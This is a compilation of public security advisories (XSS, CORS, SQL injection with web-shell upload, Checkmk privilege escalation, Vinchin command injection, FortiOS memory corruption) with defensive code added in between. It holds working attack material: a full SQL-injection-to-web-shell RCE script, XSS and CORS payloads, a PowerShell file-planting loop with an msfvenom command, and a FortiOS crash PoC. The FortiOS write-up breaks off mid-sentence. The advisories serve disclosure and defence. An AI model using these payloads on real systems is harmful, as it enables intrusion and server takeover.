<pre><code># Vulnerability type: Cross-site Scripting<br /># Vendor: https://www.unit4.com/<br /># Product: Financials by Coda<br /># Product site: https://www.unit4.com/fr/products/financial-management-software<br /># Affected version: < 2023Q4<br /># Fixed version: 2023Q4<br /># Credit: Léo DRAGHI<br /># CVE: CVE-2024-28734<br /><br /># PROOF OF CONCEPT<br />The /coda/frameset endpoint, accessible to any unauthenticated user, reflects the value of the cols parameter.<br />Because this value is neither properly sanitized nor encoded when the page is rendered, a malicious actor can execute JavaScript in the context of another user's browser simply by sending the victim a crafted link.<br /><br />GET /coda/frameset?cols="><frame%20src="javascript:alert('XSS')"> HTTP/2<br />Host: <target><br /><br /># TIMELINE<br />– 30/10/2023: Vulnerability found<br />– 02/11/2023: Vendor informed<br />– 05/12/2023: Vendor fixed the issue<br />– 14/03/2024: Public disclosure<br /></code></pre>
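The defensive counterpart of the finding above, added here as an example (not Unit4's code): a `cols` value is only ever a comma-separated list of frameset lengths, so it can be validated against that grammar and attribute-encoded before it is reflected; the helper names, default layout and frame targets are assumptions.

```python
import html
import re
from typing import Optional

# A <frameset cols="..."> value is a comma-separated list of lengths:
# pixels ("120"), percentages ("30%") or relative lengths ("*", "2*").
# Quotes, angle brackets or anything else have no business in it.
_LENGTH = re.compile(r"(?:\d+%?|\d*\*)")


def validate_cols(value: str) -> Optional[str]:
    """Return the canonical cols list, or None if the value is not a length list."""
    items = [item.strip() for item in value.split(",")]
    if any(not _LENGTH.fullmatch(item) for item in items):
        return None
    return ",".join(items)


def render_frameset(cols_param: str, default: str = "200,*") -> str:
    """Hypothetical server-side helper for the cols query parameter.

    Invalid input is replaced by a fixed layout instead of being reflected,
    and even the validated value is attribute-encoded before it is emitted.
    """
    cols = validate_cols(cols_param)
    if cols is None:
        cols = default
    return (
        '<frameset cols="%s"><frame src="menu.html"><frame src="main.html"></frameset>'
        % html.escape(cols, quote=True)
    )


if __name__ == "__main__":
    for candidate in ("200,*", "30%, 2*, 120", "100,<x>", ""):
        print(repr(candidate), "->", render_frameset(candidate))
```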
<pre><code>## Title: HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted<br />## Author: nu11secur1ty<br />## Date: 03/15/2024<br />## Vendor: https://www.halo.run/<br />## Software: https://github.com/halo-dev/halo<br />## Reference: https://portswigger.net/web-security/cors<br /><br />## Description:<br />The application implements an HTML5 cross-origin resource sharing<br />(CORS) policy for this request that allows access from any domain.<br />The application allowed access from the requested origin null.<br />The application allows two-way interaction from the null origin. This<br />effectively means that any domain can perform two-way interaction by<br />causing the browser to submit the null origin, for example by issuing<br />the request from a sandboxed iframe or a malicious phishing domain with a<br />specially crafted HTML exploit.<br /><br />STATUS: HIGH - Vulnerability<br /><br />[+]Exploit:<br />```HTML<br /><html><br /><body><br /><center><br /><h2>CORS POC Exploit<br /><h3>Extract SID<br /><br /><div id="demo"><br /><button type="button" onclick="cors()">Exploit Click here<br /></div><br /><br /><script><br />function cors() {<br />var xhttp = new XMLHttpRequest();<br />xhttp.onreadystatechange = function() {<br />if (this.readyState == 4 && this.status == 200) {<br />document.getElementById("demo").innerHTML = alert(this.responseText);<br />}<br />};<br />xhttp.open("GET",<br />"http://192.168.100.49:8090/apis/api.console.halo.run/v1alpha1/users/-",<br />true);<br />xhttp.withCredentials = true;<br />xhttp.send();<br />}<br /></script><br /><br /></body><br /></html><br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/HALO/2024/HALO-2.13.1)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/03/halo-2131-cross-origin-resource-sharing.html)<br /><br />## Time spent:<br />00:25:00<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html<br />https://cxsecurity.com/ and https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
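The policy failure the advisory describes, shown from the server side as an added example (not Halo's code): a permissive handler that echoes any Origin, including the literal `null`, with credentials enabled, beside a strict handler that only reflects exact allowlisted origins; the allowlist and origin names are constructed for the demo.

```python
from typing import Dict, Iterable, Optional


def cors_headers_permissive(origin: Optional[str]) -> Dict[str, str]:
    """Reconstruction of the behaviour in the advisory (not Halo's code): whatever
    Origin the browser sends, including "null", is echoed back together with
    Allow-Credentials, so any page can read authenticated responses."""
    if origin is None:
        return {}
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true"}


def cors_headers_strict(origin: Optional[str], allowlist: Iterable[str]) -> Dict[str, str]:
    """Hardened policy: only exact, pre-registered origins are reflected. "null"
    (sandboxed iframes, data: and file: pages) and unknown origins get no CORS
    headers at all, so the browser refuses to expose the response."""
    if origin is None or origin == "null":
        return {}
    if origin not in {o.rstrip("/") for o in allowlist}:
        return {}
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin"}  # keep caches from serving one origin's answer to another


def browser_exposes_response(headers: Dict[str, str], origin: str,
                             with_credentials: bool = True) -> bool:
    """Approximation of the browser-side check for a credentialed XHR/fetch."""
    acao = headers.get("Access-Control-Allow-Origin")
    if acao is None:
        return False
    if acao == "*":
        return not with_credentials  # "*" never satisfies a credentialed request
    if acao != origin:
        return False
    return not with_credentials or headers.get("Access-Control-Allow-Credentials") == "true"


ALLOWED = ["https://blog.example"]  # constructed allowlist for the demo

if __name__ == "__main__":
    for origin in ("https://blog.example", "null", "https://other.example"):
        weak = browser_exposes_response(cors_headers_permissive(origin), origin)
        hard = browser_exposes_response(cors_headers_strict(origin, ALLOWED), origin)
        print(f"{origin:24} permissive={weak!s:5} strict={hard}")
```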
<pre><code>from requests_toolbelt.multipart.encoder import MultipartEncoder<br />import requests<br />import string<br />import random<br />import os<br /><br /><br /># ========================================================================================================<br /><br /># Application: Membership Management System<br /># Bugs: SQL injection + Insecure File Upload = Remote Code Execution<br /># Date: 14.03.2024<br /># Exploit Author: SoSPiro<br /># Vendor Homepage: https://codeastro.com/author/nbadmin/<br /># Software Link: https://codeastro.com/membership-management-system-in-php-with-source-code/<br /># Version: 1.0<br /># --------------------------------------------------<br /><br /># Vulnerability Description:<br /><br /># The sql injection vulnerability was found in the file `Membership-PHP/index.php`<br /><br /># The login page located at MembershipM-PHP/index.php contains a SQL Injection vulnerability. <br /># This vulnerability allows attackers to inject malicious SQL code into the input fields used to provide login credentials. <br /># Through this exploit, unauthorized users can gain access to sensitive data or even take control of the system.<br /><br /><br /># Vulnerable Code Section:<br /><br /># $email = $_POST['email'];<br /># $password = $_POST['password'];<br /># $hashed_password = md5($password);<br /># $sql = "SELECT * FROM users WHERE email = '$email' AND password = '$hashed_password'";<br /><br /><br /># The Insecure File Upload vulnerability appeared in this file `MembershipM-PHP/settings.php` <br /><br /># The MembershipM-PHP/settings.php file contains an insecure file upload vulnerability. 
<br /># This allows attackers to upload unauthorized files to the server and potentially execute remote code execution (RCE) attacks.<br /><br /><br /># Vulnerable Code Section:<br /><br /># if (isset($_FILES['logo']) && $_FILES['logo']['error'] === UPLOAD_ERR_OK) {<br /># $logoName = $_FILES['logo']['name'];<br /># $logoTmpName = $_FILES['logo']['tmp_name'];<br /># $logoType = $_FILES['logo']['type'];<br /># $uploadPath = 'uploads/';<br /><br /># $targetPath = $uploadPath . $logoName;<br /># if (move_uploaded_file($logoTmpName, $targetPath)) {<br /><br /># $updateSettingsQuery = "UPDATE settings SET system_name = '$systemName', logo = '$targetPath', currency = '$currency' WHERE id = 1";<br /># $updateSettingsResult = $conn->query($updateSettingsQuery);<br /><br /># if ($updateSettingsResult) {<br /># $successMessage = 'System settings updated successfully.';} else {<br /># $errorMessage = 'Error updating system settings: ' . $conn->error;}} else {<br /># $errorMessage = 'Error moving uploaded file.';}}<br /> <br /><br /><br /># --------------------------------------------------<br /><br /># reference : https://sospiro014.github.io/Membership-Management-System-RCE<br /># I created the python code used in the exploit by looking at this https://www.exploit-db.com/exploits/50123 source and modifying it<br /><br /><br /># ========================================================================================================<br /><br /><br /># generate random string 8 chars<br />def randomGen(size=8, chars=string.ascii_lowercase):<br /> return ''.join(random.choice(chars) for _ in range(size))<br /><br /># generating a random username and a random web shell file<br />shellFile = randomGen() + ".php"<br /><br /># creating a payload for the login<br />payload = {<br /> "email": "test@mail.com' or 0=0 #",<br /> "password": "a",<br /> "login": ""<br />}<br /><br />session = requests.Session()<br /><br /># changeme<br />urlBase = "http://172.17.86.197/" # change this target 
# ip :)<br /><br /># login<br />url = urlBase + "index.php"<br />print("=== executing SQL Injection ===")<br />req = session.post(url, payload, allow_redirects=False)<br /><br /># check if 'Set-Cookie' header is present in the response<br />if 'Set-Cookie' in req.headers:<br /> cookie = req.headers["Set-Cookie"]<br /> print("=== authenticated admin cookie:" + cookie + " ===")<br />else:<br /> print("Set-Cookie header not found in the response.")<br /> exit()<br /><br /># upload shell<br />url = urlBase + "settings.php"<br /><br /># Get user input for the command to execute<br />cmd_input = input("Enter the command to execute: ")<br /><br /># PHP code to execute the command received from the user<br />php_code = "<?php if(isset($_REQUEST['cmd'])){$cmd = ($_REQUEST['cmd']); system($cmd);die; }?>"<br /><br />mp_encoder = MultipartEncoder(<br /> fields={<br /> "systemName": "Membership System",<br /> "currency": "$",<br /> "logo": (shellFile, php_code, "application/x-php"),<br /> "updateSettings": ""<br /> }<br />)<br /><br />headers = {<br /> "Cookie": cookie,<br /> 'Content-Type': mp_encoder.content_type<br />}<br /><br />print("=== login user and uploading shell " + shellFile + " ===")<br />req = session.post(url, data=mp_encoder, allow_redirects=False, headers=headers)<br /><br /># curl the shell for test<br />requestUrl = "curl " + urlBase + "uploads/" + shellFile + "?cmd=" + cmd_input<br />print("=== issuing the command: " + requestUrl + " ===")<br /><br />print("=== CURL OUTPUT ===")<br />os.system(requestUrl)<br /></code></pre>
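From the detection side, the exploit chain above leaves a clear trace in the web server's access log: a POST to settings.php followed by a request for a .php file under uploads/ with a cmd parameter. The following is an added example (not part of the advisory) that runs that rule over constructed log lines; the log format and upload directory are assumptions.

```python
import re
from typing import Dict, List

# Apache/nginx combined log format; only the fields the rule needs are captured.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Server-side script extensions that must never be served from an upload directory.
_SCRIPT_EXT = re.compile(r"\.(?:php\d?|phtml|phar)$", re.IGNORECASE)


def detect_upload_webshell(lines: List[str], upload_dir: str = "/uploads/") -> List[Dict[str, str]]:
    """Flag script files requested from the upload directory, and enrich the alert
    when the same client posted to settings.php earlier or passed a cmd parameter."""
    alerts = []
    last_settings_post = {}  # client ip -> timestamp of its last POST to settings.php
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, status = (m.group(g) for g in ("ip", "ts", "method", "path", "status"))
        url, _, query = path.partition("?")
        if method == "POST" and url.endswith("/settings.php"):
            last_settings_post[ip] = ts
        if url.startswith(upload_dir) and _SCRIPT_EXT.search(url):
            reasons = ["script requested from upload directory"]
            if re.search(r"(?:^|&)cmd=", query):
                reasons.append("cmd parameter present")
            if ip in last_settings_post:
                reasons.append("same client posted to settings.php at " + last_settings_post[ip])
            alerts.append({"ip": ip, "ts": ts, "path": path, "status": status,
                           "reason": "; ".join(reasons)})
    return alerts


# Constructed sample log lines for the demo (not from a real incident).
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Mar/2024:10:00:01 +0000] "POST /index.php HTTP/1.1" 302 0',
    '10.0.0.5 - - [14/Mar/2024:10:00:02 +0000] "POST /settings.php HTTP/1.1" 302 0',
    '10.0.0.5 - - [14/Mar/2024:10:00:03 +0000] "GET /uploads/qwertyui.php?cmd=id HTTP/1.1" 200 57',
    '10.0.0.9 - - [14/Mar/2024:10:05:00 +0000] "GET /uploads/logo.png HTTP/1.1" 200 4210',
    '10.0.0.9 - - [14/Mar/2024:10:05:01 +0000] "GET /index.php HTTP/1.1" 200 1020',
]

if __name__ == "__main__":
    for alert in detect_upload_webshell(SAMPLE_LOG):
        print(alert)
```

The login SQL injection itself is not visible in an access log because the payload travels in the POST body; that part needs application-level logging or a WAF in front of index.php.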
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240307-0 ><br />=======================================================================<br /> title: Local Privilege Escalation via writable files<br /> product: Checkmk Agent<br /> vulnerable version: 2.0.0, 2.1.0, 2.2.0<br /> fixed version: 2.1.0p40, 2.2.0p23, 2.3.0b1, 2.4.0b1<br /> CVE number: CVE-2024-0670<br /> impact: high<br /> homepage: https://checkmk.com<br /> found: 2023-12-01<br /> by: Michael Baer (Office Fürth)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Checkmk 2.2 has arrived – and is ready to monitor your hybrid IT<br />infrastructure with new features for monitoring native cloud applications,<br />OpenShift support, an expanded REST API, UX improvements, enhanced<br />integrations and over 174 new or reworked checks and agents. Monitor your<br />cloud assets from top hyperscalers with Checkmk 2.2 in addition to the<br />powerful monitoring of your on-premises networks and servers."<br /><br />Source: https://checkmk.com/product/latest-version<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br />SEC Consult highly recommends to perform a thorough security review of the<br />product conducted by security professionals to identify and resolve potential<br />further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Local Privilege Escalation via writable files (CVE-2024-0670)<br />In some cases, the software creates temporary files inside the directory<br />C:\Windows\Temp that get executed afterwards. 
An attacker can leverage this<br />to place write-protected malicious files in the directory beforehand. The files<br />get executed by Checkmk with SYSTEM privileges, allowing attackers to escalate<br />their privileges.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Local Privilege Escalation via writable files (CVE-2024-0670)<br />In the first step, the filename that will be used by Checkmk needs to be found.<br />The application creates temporary files with the name cmk_{}_{}_{}.cmd. The<br />placeholders are replaced with a string, the process id and a counter. The first<br />string was always 'all' and the counter usually is 0. The process id is not<br />exactly predictable. However, Windows assigns those numbers in increasing order.<br />This makes it possible to observe the currently used process ids and define a<br />limited range of probable ids.<br /><br />In the second step, the attacker places the malicious binary into the folder<br />C:\Windows\Temp multiple times. The filenames are constructed using the above<br />pattern for all different probable ids. After placing the files, the attacker<br />marks them as read-only. Both can be automated using the following PowerShell<br />command. Here, the range of probable ids was determined to be between 10000<br />and 30000. The file C:\Users\attacker\Desktop\mal.exe is the malicious file.<br /><br />10000..30000 | foreach {<br /> copy C:\Users\attacker\Desktop\mal.exe C:\Windows\Temp\cmk_all_${_}_1.cmd;<br /> Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true;<br />}<br /><br />For this proof of concept, a binary was created using msfvenom that executes<br />the command whoami and writes the result to a file. This allows verifying the<br />successful execution as the SYSTEM user. The following command was used:<br /><br />msfvenom -p windows/exec CMD='cmd /c "whoami > C:\abc\file"' -f exe -o mal.exe<br /><br />It should be noted that the folder C:\abc has to exist and that the anti-virus<br />solution must be disabled to execute this particular binary.<br /><br />The final step is to force Checkmk to write and execute those temporary files.<br /><br />It was observed that repairing the software is enough. This repair process can<br />be initiated via the Windows GUI or using the following command. The name<br />fafda3e.msi will be different on every system. The folder C:\Windows\Installer<br />can be investigated to find the correct name on a given system.<br /><br />msiexec /fa C:\Windows\Installer\fafda3e.msi<br /><br />After the repair has finished, the file written by the malicious binary can be<br />checked. It was created and contains the string "nt authority\system".<br />[see figure checkmk_tempfolder.png]<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested:<br />* 2.1.0<br /><br />According to the vendor, the following versions are affected:<br />* 2.0.0<br />* 2.1.0<br />* 2.2.0<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2024-01-15: Contacting vendor through security@checkmk.com<br />2024-01-18: Vendor confirms vulnerability, assigns CVE, and<br /> prepares a fix<br />2024-01-26: Providing credits and acknowledging CVSS score.<br />2024-03-04: Vendor informs us that fixes with Werk #16361<br /> are available.<br />2024-03-07: Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />Install the latest version 2.1.0p40 or 2.2.0p23 from the vendor's<br />download page:<br /><br />https://checkmk.com/download<br /><br />More information can be found within the vendor's security advisory:<br />https://checkmk.com/werk/16361<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br 
/>Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Michael Baer / @2024<br /></code></pre>
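A triage check that follows from the advisory, added here as an example (not SEC Consult's or Checkmk's code): the agent writes its cmk_*_*_*.cmd files itself, so files matching that pattern that are read-only, or a large batch of them spanning a wide range of pids, are pre-planted rather than agent activity. The pattern, thresholds and the constructed sample layout in demo() are assumptions.

```python
import os
import re
import stat
import tempfile
from typing import Dict

# Temporary file pattern the advisory describes: cmk_<string>_<pid>_<counter>.cmd
CMK_TEMP_RE = re.compile(r"^cmk_[A-Za-z0-9]+_(\d+)_(\d+)\.cmd$", re.IGNORECASE)
READONLY_ATTR = getattr(stat, "FILE_ATTRIBUTE_READONLY", 1)


def is_read_only(st: os.stat_result) -> bool:
    """True if the file carries the Windows ReadOnly attribute or lacks the owner
    write bit (the POSIX view of the same thing, which os.chmod(0o444) sets)."""
    if getattr(st, "st_file_attributes", 0) & READONLY_ATTR:
        return True
    return not (st.st_mode & stat.S_IWUSR)


def audit_temp_dir(temp_dir: str) -> Dict[str, object]:
    """Inventory files matching the agent's temp-file pattern and flag planted ones."""
    names, read_only, pids = [], [], []
    for name in sorted(os.listdir(temp_dir)):
        m = CMK_TEMP_RE.match(name)
        if not m:
            continue
        st = os.stat(os.path.join(temp_dir, name))
        if not stat.S_ISREG(st.st_mode):
            continue
        names.append(name)
        pids.append(int(m.group(1)))
        if is_read_only(st):
            read_only.append(name)
    pid_range = (min(pids), max(pids)) if pids else None
    # Assumed threshold: the agent never leaves dozens of these behind at once.
    return {"count": len(names), "read_only": read_only, "pid_range": pid_range,
            "suspicious": bool(read_only) or len(names) > 50}


def demo() -> Dict[str, object]:
    """Run the audit against a constructed layout: one planted read-only file,
    one ordinary agent-style file and one unrelated file."""
    with tempfile.TemporaryDirectory() as d:
        planted = os.path.join(d, "cmk_all_12345_1.cmd")
        for fname in ("cmk_all_12345_1.cmd", "cmk_all_12346_0.cmd", "notes.txt"):
            with open(os.path.join(d, fname), "w") as fh:
                fh.write("echo test\n")
        os.chmod(planted, 0o444)
        try:
            return audit_temp_dir(d)
        finally:
            os.chmod(planted, 0o644)  # let TemporaryDirectory clean up on Windows


if __name__ == "__main__":
    target = r"C:\Windows\Temp" if os.name == "nt" else tempfile.gettempdir()
    print(audit_temp_dir(target))
```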
<pre><code>CVE ID: CVE-2024-25228<br /><br />Title: Authenticated Command Injection Vulnerability in ManoeuvreHandler.class.php of Vinchin Backup & Recovery Versions 7.2 and Earlier<br /><br />Description:<br />A critical security vulnerability has been discovered in the `getVerifydiyResult` function within the `ManoeuvreHandler.class.php` file of Vinchin Backup & Recovery software, affecting versions 7.2 and earlier. This function, intended for validating IP addresses or web resources, is vulnerable to authenticated command injection due to insufficient input validation and sanitization.<br /><br />Function Analysis:<br />- The function accepts an input array `$params`, focusing on the `type` and `value` keys.<br />- Based on the `type`, it attempts to validate the input using either `verifyPing` (for IP addresses) or `verifyWeb` (for web resources).<br />- The vulnerability specifically lies in the `verifyPing` method, where the `exec` function is used to execute a `ping` command with the user-supplied `value`, without proper validation or sanitization.<br /><br />Exploitation Risk:<br />Authenticated attackers can exploit this vulnerability by injecting malicious commands into the `value` parameter. When processed by the vulnerable function, these commands can be executed on the server, leading to unauthorized access or control.<br /><br />Current Status:<br />As of the latest available information, no patch has been released for this vulnerability in versions 7.2 and earlier of Vinchin Backup & Recovery. The vendor has not acknowledged the vulnerability.<br /><br />Recommendation:<br />Users are advised to apply strict access controls to mitigate the risk posed by this vulnerability until an official patch is released. Monitoring for any updates from Vinchin regarding this issue is also recommended.<br /><br />Discoverer: Valentin Lobstein<br /><br /></code></pre>
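How the verifyPing step should handle the value, as an added example (not Vinchin's code): the supplied target is parsed as an IP address and ping is invoked with an argv list and no shell, so metacharacters in the value can neither add commands nor extra flags. Linux iputils ping syntax and the function names are assumptions.

```python
import ipaddress
import subprocess
from typing import List


def build_ping_argv(value: str, count: int = 1, timeout_s: int = 2) -> List[str]:
    """Validate the user-supplied target and return an argv list for subprocess.

    The pattern described in the advisory amounts to exec("ping " . $value):
    shell metacharacters in $value become extra commands. Parsing the value as
    an IP address and passing argv without a shell removes that possibility,
    and the leading "ping" plus fixed flags mean the value can never be
    interpreted as an option either.
    """
    try:
        target = ipaddress.ip_address(value.strip())
    except ValueError as exc:
        raise ValueError("not an IP address: %r" % value) from exc
    # iputils ping syntax (Linux) is assumed; on Windows it would be -n / -w.
    return ["ping", "-c", str(count), "-W", str(timeout_s), str(target)]


def verify_ping(value: str) -> bool:
    """Safe counterpart of the advisory's verifyPing: True if the host answered."""
    try:
        argv = build_ping_argv(value)
    except ValueError:
        return False
    result = subprocess.run(argv, stdout=subprocess.DEVNULL,
                            stderr=subprocess.DEVNULL, timeout=10)
    return result.returncode == 0


def is_rejected(value: str) -> bool:
    """True if the validator refuses the value (helper for checks and tests)."""
    try:
        build_ping_argv(value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for candidate in ("192.0.2.10", "2001:db8::1", "192.0.2.10 -c 100000", "not-an-ip"):
        print(repr(candidate), "rejected" if is_rejected(candidate) else build_ping_argv(candidate))
```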
<pre><code># CVE-2024-21762<br />Out-of-bounds write in Fortinet FortiOS (CVE-2024-21762)<br /><br />Vulnerability<br />=====<br /><br />FortiGate released a version update in February, fixing multiple medium- and high-risk vulnerabilities. One of the severe vulnerabilities is an unauthenticated out-of-bounds write in SSL VPN. The vulnerability advisory states that it may be exploited in the wild. This article presents the author's analysis of how this vulnerability can be exploited to achieve remote code execution.<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/7f0e0f05-9d1b-4e4e-b877-646dc585f07a)<br /><br /><br />The environment used for vulnerability analysis in this article is `FGT_VM64-v7.4.2.F-build2571`.<br /><br />diff<br />======<br /><br />Comparing the binaries of the vulnerable and patched versions (7.4.2 and 7.4.3), the analysis found that the patched code is located in function `sub_18F4980` (7.4.2).<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/a07f1ef5-5fc6-451b-9613-d1adbeb1e734)<br /><br />Analyzing this function, it is not difficult to see that its logic is to read the body of an HTTP POST request. It decides from the `Transfer-Encoding` request header whether to read the body in chunked format or based on `Content-Length`. According to the control flow graph comparison, there are two code modifications:<br /><br />When parsing the chunked format, `ap_getline` is called to read the chunk length, and the return value of `ap_getline` is checked against 16. If it is greater than 16, the chunk length is considered illegal.<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/079c74e6-1302-42ce-bb83-519e11d9505b)<br /><br />When reading the chunk trailer, the offset at which `\r\n` is written is `line_off`. Before the fix, `line_off` is assigned from `*(_QWORD *)(a1 + 744)`; after the fix, it is assigned from the return value of `ap_getline`.<br /><br />Tracing further back, `*(_QWORD *)(a1 + 744)` turns out to hold the length of the chunk length field from the first check.<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/a11a4bea-7e45-4ec7-b63c-34f8dd0337c0)<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/63f92eaf-68f6-4d32-935b-0451e5da07dc)<br /><br />Reading the code also shows that when the hex-decoded value of the chunk length field is 0, the code enters the chunk trailer reading logic.<br /><br />Triggering the out-of-bounds write<br />=========<br /><br />After analyzing the patch, we can draw the following conclusions:<br /><br />1. When parsing a chunk, if the hex-decoded value of the chunk length field is 0, the chunk trailer is read.<br />2. After calling `ap_getline` to read the chunk trailer, `\r\n` is written to the buffer at an offset determined by the length of the chunk length field.<br /><br />Therefore, if many 0s are passed in the chunk length field, and the number of 0s is greater than half of the remaining buffer length, an out-of-bounds write of `\r\n` is triggered. Through debugging, the target buffer is found to be on the stack of function `sub_1A111E0`, and the return address is stored at offset 0x2028. If `\r\n` is written at offset 0x202e, a crash occurs when the function executes `ret`, because the value restored into rip is an illegal address.<br /><br />Crash PoC:<br /><br />```python<br />pkt = b"""\<br />GET / HTTP/1.1<br />Host: %s<br />Transfer-Encoding: chunked<br /><br />%s\r\n%s\r\n\r\n""" % (hostname.encode(), b"0"*((0x202e//2)-2), b"a")<br /><br />ssock = create_ssock(hostname, port)<br />ssock.send(pkt)<br />ssock.recv(4096)<br />```<br /><br />Crash scene:<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/b948f525-bee9-4344-85c1-b1fce8d65acb)<br /><br /><br />From the cause of the vulnerability, it can be seen that it allows the two bytes `\r\n` to be written out of bounds on the stack, at a distance close to `0x2000`. Since the written content is very limited, RCE cannot be achieved by directly hijacking rip, so the focus has to be on the memory pointers saved on the stack.<br /><br /><br />Failed attempt<br />============<br /><br />The first idea is to hijack rbp: overwrite the low byte of rbp so that rbp points to a controllable memory area, so that when the upper-level function returns through `leave; ret`, rip can be completely hijacked. However, during verification it was found that even if rbp on the stack is overwritten, rsp and rip cannot be hijacked, and the program does not even crash. Tracing back up from `sub_1A111E0`, we find the parent function `sub_1A26040`. When it returns, this function does not restore rsp with `leave; ret` but directly with `add rsp, 0x18`, so the expected effect cannot be achieved.<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/9097dd29-45a8-41c7-99be-eddd88308cce)<br /><br />Finding another breakthrough point<br />======<br /><br />As seen in the previous section, the function `sub_1A26040` saves the values of the five registers `rbx` and r12-r15 on the stack and restores them when it returns. Continuing to backtrack, we find the parent function `sub_1A27650`. It can be seen that what is saved in r13 is exactly the parameter `a1`.<br /><br /><br />`a1` is a structure pointer. Through debugging, we can also see that the r13 slot on the stack holds a heap address.<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/8d419563-39f1-47b0-93b5-8f438cdecbf7)<br /><br /><br />If the memory in the red area in the figure is overwritten by the out-of-bounds write, the r13 register restored when `sub_1A26040` returns is tampered with, and with it the value of the `a1` pointer. If the heap can be laid out so that `a1` points to a memory area prepared in advance, the entire `a1` structure can be hijacked. At the same time, analysis of the code logic of `sub_1A27650` and `sub_1A26040` shows a large number of dynamic function calls through multi-level members of the `a1` structure, so there are many opportunities to exploit a hijacked `a1`.<br /><br />Hijacking a structure<br />==============<br /><br />According to this idea, after the low bytes of the `a1` pointer are overwritten with `\r\n`, it can point to the pre-arranged memory, as the picture shows:<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/16ecb081-617e-42a6-b0d7-f009d0a235a3)<br /><br />In order to achieve this effect, the following conditions need to be met:<br /><br />1. The `a1` structure address is higher than the heap spray area address, and the gap between them is very small.<br />2. `0x7fxxxxxxx0a0d` must point to the forged structure.<br /><br />Debugging shows that the size of the `a1` structure is `0x730`. According to the alignment rules of jemalloc, a heap block of size `0x800` is allocated for it. The 0x800 heap block is not commonly used during request processing, so it is easy to exhaust the `0x800` blocks in tcache and at the same time request more new 0x800 blocks, so that they enter tcache after release. The heap spray also uses heap blocks of an uncommon size, so that the newly allocated blocks are contiguous and close to the newly allocated 0x800 block; it uses larger heap blocks so that their addresses are aligned to 0x800, which makes it easy to ensure that the lower 12 bits of each forged structure address are 0xa0d; and the spray range is not less than `0x10000`, to ensure that `0x7fxxxxxxx0a0d` points into the sprayed area. The effect after hijacking is as follows:<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/4553bf2f-7590-4dcd-bd94-972465e7be5f)<br /><br />Finding exploitable multi-level pointers<br />======================<br /><br />Through the above operations, the hijacking of the `a1` structure can be achieved. Combing through the code of functions `sub_1A27650` and `sub_1A26040`, there are many dynamic calls through second-level and third-level pointers of `a1` structure members, for example:<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/f9f65242-90dd-43ee-8fdb-95fa9059805e)<br 